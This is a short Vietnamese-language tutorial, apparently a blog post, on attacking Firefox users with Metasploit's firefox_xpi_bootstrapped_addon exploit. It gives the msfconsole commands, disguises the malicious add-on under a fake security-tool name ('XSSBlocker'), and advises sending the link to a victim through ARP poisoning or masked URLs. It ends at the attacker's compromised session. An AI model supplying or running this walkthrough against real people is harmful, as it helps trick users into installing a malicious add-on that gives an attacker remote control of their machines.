Trước tiên chúng ta cần update metaspoit
Đối với các bản backtrack cũ chỉ cần chạy ./msfupdate, các bản Backtrack sau này các bạn chỉ có thể update qua svn, trong trường hợp của mình, cách làm như sau:
cd /pentest/exploits/framework/ svnupdate
rồi, chúng ta và msfconsole và search firefox xpi
Một lô danh sách xổ ra, ta chọn
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
Show options xem sao:
Có nhiều option nhưng ta chỉ cần lưu ý đến ADDONNAME và URIPATH.
Ta set tên addon trước
set ADDONNAME XSSBlocker antoanthongtin.org
Và set lại đường dẫn chứa addon, việc này giúp chúp ta loại bỏ phần râu ria phía sau URL
set URIPATH /
OK, exploit thôi
Chúng ta đã dựng được server chứa addon, kế đến là gửi link này cho victim, các bạn có thể áp dụng các biện pháp ARP Possoining hoặc các biện pháp che dấu URL nhằm đánh lừa victim.
Giả sử victim vào link này và cài đặt addon (mình dùng firefox bản mới nhất để thử)
Khi cài đặt thành công, bên phía kẻ tấn công sẽ thấy
Ta thử xem sessions có hay không
Ngon rồi, tương tác thôi:
